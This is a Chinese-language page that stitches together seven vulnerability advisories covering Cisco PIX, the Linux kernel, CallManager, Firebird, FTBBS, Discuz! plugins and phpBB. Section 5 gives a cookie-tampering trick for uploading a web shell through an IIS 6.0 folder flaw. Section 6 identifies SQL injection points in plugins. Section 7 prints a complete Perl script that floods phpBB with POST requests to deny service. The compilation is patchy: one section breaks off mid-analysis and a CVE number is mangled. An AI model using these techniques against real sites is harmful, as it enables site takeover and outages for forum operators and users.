Cisco PIX 6.3/7.0欺骗TCP SYN报文拒绝服务漏洞
“不吐不快”通过精心收集,向本站投稿了7篇Cisco PIX 6.3/7.0欺骗TCP SYN报文拒绝服务漏洞,以下是小编帮大家整理后的Cisco PIX 6.3/7.0欺骗TCP SYN报文拒绝服务漏洞,仅供参考,欢迎大家阅读。
篇1:Cisco PIX 6.3/7.0欺骗TCP SYN报文拒绝服务漏洞
受影响系统:
Cisco PIX Firewall 7.0Cisco PIX Firewall 6.3
详细描述:
Cisco PIX是一款硬件防火墙解决方案,
Cisco PIX 6.3/7.0欺骗TCP SYN报文拒绝服务漏洞
,
Cisco PIX在处理畸形的TCP报文时存在漏洞,远程攻击者可能利用此漏洞对合法源访问进行拒绝服务攻击。如果通过PIX防火墙发送了有错误校验和的TCP SYN报文的话,PIX就会阻断使用相同源和目标TCP端口及IP地址的新TCP连接,直到30秒后才会允许新的连接。因此攻击者可以发送有错误校验和的特制TCP报文,将源/目标IP和端口设置为合法的主机。一旦PIX防火墙接收了这样的报文,就无法同恶意报文中所指定的凭据建立新的TCP会话,默认时间为7.0版为30秒,6.3版为2分2秒,之后会恢复正常运行。
篇2:Linux Kernel畸形ULE报文处理远程拒绝服务漏洞
受影响系统:Linux kernel 2.6.x <= 2.6.17.7不受影响系统:Linux kernel 2.6.17.8描述:
BUGTRAQ ID: 19939CVE(CAN) ID: CVE--4623
Linux Kernel是开放源码操作系统Linux所使用的内核,
Linux的ULE(单向轻型封装RFC 4326)拆封代码存在一个漏洞,远程攻击者可能利用此漏洞对接收处理的服务器造成拒绝服务攻击。
攻击者可以通过发送SNDU长度为0的ULE报文导致漏洞的触发。
<*来源:Ang Way Chuang (wcang@nrg.cs.usm.my)
链接:lkml.org/lkml/2006/8/20/278
*>
建议:
厂商补丁:Linux
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
www.kernel.org/
diff -uprN linux-2.6.17.8/drivers/media/dvb/dvb-core/dvb_net.c linux-2.6.17.8-fix/drivers/media/dvb/dvb-core/dvb_net.c
--- linux-2.6.17.8/drivers/media/dvb/dvb-core/dvb_net.c 2006-08-07 12:18:54.000000000 +0800
+++ linux-2.6.17.8-fix/drivers/media/dvb/dvb-core/dvb_net.c 2006-08-21 11:09:12.000000000 +0800
@@ -492,7 +492,7 @@ static void dvb_net_ule( struct net_devi
} else
priv->ule_dbit = 0;
- if (priv->ule_sndu_len >32763) {
+ if (priv->ule_sndu_len >32763 || priv->ule_sndu_len < ((priv->ule_dbit) ? 4 : 4 + ETH_ALEN)) {
printk(KERN_WARNING “%lu: Invalid ULE SNDU length %u. ”
“Resyncing.\n”, priv->ts_count, priv->ule_sndu_len);
priv->ule_sndu_len = 0;
篇3:Cisco CallManager拒绝服务漏洞
成功利用这些漏洞会导致拒绝服务攻击,造成高CPU使用率、中断服务或重启服务器,然后可能导致电话无法响应、从CCM注销电话或CCM重启,
详细描述:
Cisco CallManager(CCM)是Cisco IP电话解决方案的基于软件的呼叫处理组件。 P
一些CCM版本没有主动管理TCP连接和Windows消息,导致一些公开的发布端口受拒绝服务攻击影响:
1 CCM没有足够主动的超时到端口的TCP连接,导致足够多的开放连接会耗尽内存和CPU资源。在特定的情况下,CCM会无限期的保持TCP连接开放,直到重启CCM服务或重启服务器。
2 多个到、或7727端口的连接会充满Windows消息队列,导致CCM无法处理Windows Service Manager,在30秒超时后重启CCM,
成功利用这些漏洞会导致拒绝服务攻击,造成高CPU使用率、中断服务或重启服务器,然后可能导致电话无法响应、从CCM注销电话或CCM重启。
受影响系统:
Cisco Call Manager = 3.2
Cisco Call Manager 4.1
Cisco Call Manager 4.0
Cisco Call Manager 3.3
补丁下载:
Cisco
-----
Cisco已经为此发布了一个安全公告(cisco-sa-20060118-ccmdos)以及相应补丁:
cisco-sa-20060118-ccmdos:Cisco Call Manager Denial of Service
链接:www.cisco.com/warp/public/707/cisco-sa-20060118-ccmdos.shtml
篇4:请求远程拒绝服务漏洞
/* CSS Document */
Firebird是一款提供多个ANSI SQL-92功能的关系型数据库,可运行在Linux、Windows和各种Unix平台下,
在Firebird的src/remote/server.cpp文件中,process_packet2函数负责处理从客户端发送过来的报文。这个函数有一个switch语句考虑协议中所定义的所有可能的opcode。
/-----------
src/remote/server.cpp:
...
3404 P_OP p = receive->p_operation;
3405 switch (op)
3406 {
3407 case op_connect:
...
3426 case op_compile:
...
3430 case op_attach:
...
- -----------/
在op_connect_request报文的情况下,执行流进入switch语句的以下case:
/-----------
src/remote/server.cpp:
...
3584 case op_connect_request:
3585 aux_request(port, &receive->p_req, sendL);
3586 break;
- -----------/
在调用aux_request()函数并执行break语句后,执行流到达:
/-----------
src/remote/server.cpp:
...
3652 if (port && port->port_state == state_broken) {
3653 if (!port->port_parent) {
3654 gds__log(“SERVER/process_packet: broken port, server exiting”);
3655 port->disconnect(sendL, receive);
3656 ThreadData::restoreSpecific();
3657 return false;
3658 }
3659 port->disconnect(sendL, receive);
3660 port = NULL;
3661 }
- -----------/
通过在接收到op_connect_request报文时调试fbserver.exe二进制程序可以看出满足了第一个if语句的条件,但没有满足第二个if的条件,因此执行流到达port->disconnect()调用:
/-----------
005ACE2C |> 837E 0C 03 CMP DWORD PTR DS:[ESI+C],3
;port->port_state == state_broken ?
005ACE30 |. 75 1B JNZ SHORT fbserver.005ACE4D
005ACE32 |. 837E 1C 00 CMP DWORD PTR DS:[ESI+1C],0
;port->port_parent == 0?
005ACE36 |. 75 0A JNZ SHORT fbserver.005ACE42
;this conditional jump is taken
005ACE38 |. 68 D4D65F00 PUSH fbserver.005FD6D4
; ASCII “SERVER/process_packet: broken port, server exiting”
005ACE3D |.^ E9 44FDFFFF JMP fbserver.005ACB86
005ACE42 |> 53 PUSH EBX
; /Arg2
005ACE43 |. 57 PUSH EDI
; |Arg1
005ACE44 |. 8BCE MOV ECX,ESI
; |
005ACE46 |. E8 65D7FFFF CALL
; /port->disconnect(sendL, receive)
- -----------/
根据src/remote/remote.h中的定义,port的类型为struct rem_port,
这种结构类型在src/remote/server.cpp中实现了disconnect()函数:
/-----------
src/remote/server.cpp:
1464 void rem_port::disconnect(PACKET* sendL, PACKET* receiveL)
- -----------/
在这个函数中执行以下代码以释放发送和接收的报文并关闭相关的套接字:
/-----------
src/remote/server.cpp:
[1] [2] 下一页
篇5:FTBBS ASP 7.0 上传漏洞漏洞预警
< %
userid=getcookie(“clubuser_id”)
............
if Application(“FTBBSMB”)(7,0)=“M” then
inFolder=year(date())&month(date())
else
inFolder=year(date())&month(date())&day(date())
end if
call makefolder(inFolder,fso)
myFolder = inFolder&“/”&userid
call makefolder(myFolder,fso)
...................
formPath=inFolder&“/”&userid
......上传过程省略.....
建立的文件夹读取的COOKIE里的userid
修改COOKLIE里userid的值为fuck.asp形式即可建立IIS 6.0缺陷文件夹导致可以上传JPG的小马
至于修改COOKIE各位大大应该都会吧~FTBBS貌似所有版本都有此问题吧~
篇6:Discuz! 7.0 若干插件漏洞分析
Discuz!是国内第一大论坛,在经历了多年的风风雨雨后,安全可以说也是数一数二了,不过我发现,越来越多的非Discuz!官方提供的插件存在安全漏洞,如果不及时修复,可能会影响整个站点的安全。
1.【DST】社区竞拍中心 V1.0 GBK For Discuz!7.0 注入:
DST的一个竞拍插件,官方地址:www.17dst.com/thread-409-1-1.html
好了看源码:
程序代码
//sql未初始化
if($ob=='my'){
$sql=“ and a.uid='$discuz_uid'”;
}
if($list!='race'){
if($list){
$navigation.=“ » $auction_lang[once_goods]”;
//这里带进来查询
$count=$db->result($db->query(“select count(*) from {$tablepre}auctions a where gmode='1' $sql”),0);
......
}
2.竞拍中心3.0 [ + SD01] -- 柒瑞精品discuz6/7商业插件 注入:
柒瑞出品的一个商业插件,收费的,DZ官方的链接:www.discuz.net/thread-139-1-1.html
这个插件我百度了下,没找到源码,不过随便测试了一下:
3.[DST]团队展示Flash1.0版本插件 注入:
DST出的一个团队展示插件,官方链接:www.17dst.com/thread-142-1-1.html
这个有源码,看一下:
.....
//这里
$query = $db->query(“Select * FROM `{$tablepre}members` Where `groupid` =$agid ”);
if ($db->num_rows($query) >0) {
......
}
漏洞太明显了,不多说了,测试了一下官方,49个字段
4.某一个帐号发放系统 注入
5.社区茶坊 for DZ7.0(带后台聊天室) XSS:
DZ官方的地址:
6.很多插件写cache的地方太大意了,可能导致意想不到的问题,正如某婚恋插件,管理员权限下可以轻松拿shell的,这个就不多说了,
DZ的插件很多,没时间细看,最近维护自己的一个论坛时无意中遇到就检测下,还是希望各位作者有点安全意识~
本文来源于:乐乐的博客 www.smilele.cn/ , 原文地址:www.smilele.cn/lele/Discuz7.html
篇7:phpBB远程拒绝服务漏洞漏洞预警
phpBB远程拒绝服务漏洞
漏洞版本:
phpBB phpBB 3.0.8
phpBB phpBB 3.0.7
phpBB phpBB 3.0.6
phpBB phpBB 3.0.5
phpBB phpBB 3.0.4
phpBB phpBB 3.0.3
phpBB phpBB 3.0.2
phpBB phpBB 3.0.1
phpBB phpBB 3.0
phpBB phpBB 2.0.21
phpBB phpBB 2.0.19
phpBB phpBB 2.0.17
phpBB phpBB 2.0.16
phpBB phpBB 2.0.15
phpBB phpBB 2.0.14
phpBB phpBB 2.0.13
phpBB phpBB 2.0.12
phpBB phpBB 2.0.11
phpBB phpBB 2.0.10
phpBB phpBB 2.0.9
phpBB phpBB 2.0.7
phpBB phpBB 2.0.6
phpBB phpBB 2.0.5
phpBB phpBB 2.0.4
phpBB phpBB 2.0.3
phpBB phpBB 2.0.2
phpBB phpBB 2.0.1
phpBB phpBB 1.4.4
phpBB phpBB 1.4.2
phpBB phpBB 1.4.1
phpBB phpBB 1.2.1
phpBB phpBB 2.0.22
phpBB phpBB 2.0.20
phpBB phpBB 2.0.18
漏洞描述:
Bugtraq ID:65481
phpBB是phpBB组开发的一套开源的使用PHP语言开发的Web论坛软件,该软件具有支持多国语言、支持多种数据库和自定义版面设计等特点。
phpBB中存在远程拒绝服务漏洞。攻击者可利用该漏洞造成受影响应用程序崩溃,拒绝服务合法用户。
<* 参考
www.securityfocus.com/bid/65481
sebug.net/appdir/phpBB
*>
测试方法:
@Sebug.net dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
###########################
# Phpbb Forum Denial of Service Vulnerability
###########################
#!/usr/bin/perl
# Iranian Exploit DataBase
# Phpbb Forum Denial of Service Vulnerability
# Version: All Version
# Vendor site : www.phpbb.com
# Code Written By Amir – iedb.team@gmail.com – o0_iedb_0o@yahoo.com
# Site : Www.IeDb.Ir – Www.IrIsT.Ir
# Fb Page :
www.facebook.com/pages/Exploit-And-Security-Team-iedbir/199266860256538
# Greats : TaK.FaNaR – ErfanMs – Medrik – F@riD – Bl4ck M4n – 0x0ptim0us
- 0Day – Dj.TiniVini – E2MA3N
# l4tr0d3ctism – H-SK33PY – Noter – r3d_s0urc3 – Dr_Evil And All
Members In IeDb.Ir/acc
#####################################
use Socket;
if (@ARGV < 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<10; $i–)
{
$data =
“securitytoken=guest&do=process&query=%DB%8C%D8%B3%D8%A8%D9%84%D8%B3%DB%8C%D9%84%D8%B3%DB%8C%D8%A8%D9%84%0%0%0%0%0%0%0%0%0%0&submit.x=0&submit.y=0″;
$len = length $data;
$foo = “POST “.$dir.”search.php?do=process HTTP/1.1\r\n”.
“Accept: * /*\r\n”.
“Accept-Language: en-gb\r\n”.
“Content-Type: application/x-www-form-urlencoded\r\n”.
“Accept-Encoding: gzip, deflate\r\n”.
“User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n”.
“Host: $host\r\n”.
“Content-Length: $len\r\n”.
“Connection: Keep-Alive\r\n”.
“Cache-Control: no-cache\r\n\r\n”.
“$data”;
my $port = “80″;
my $proto = getprotobyname(‘tcp’);
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,”$foo”, 0);
syswrite STDOUT, “+” ;
}
print “\n\n”;
system(‘ping $host’);
sub usage {
print “\n”;
print “################################################# \n”;
print “## Phpbb Forum Denial of Service Vulnerability\n”;
print “## Discoverd By Amir – iedb.team@gmail.com – Id : o0_iedb_0o \n”;
print “## Www.IeDb.Ir – Www.IrIsT.Ir \n”;
print “################################################# \n”;
print “## [host] [path] \n”;
print “## host.com /forum/\n”;
print “################################################# \n”;
print “\n”;
exit();
};
#####################################
# Archive Exploit = www.iedb.ir/exploits-868.html
#####################################
###########################
# Iranian Exploit DataBase = IeDb.Ir [2013-11-17]
###########################
安全建议:
目前厂商暂无提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
www.phpbb.com/
【Cisco PIX 6.3/7.0欺骗TCP SYN报文拒绝服务漏洞】相关文章:






文档为doc格式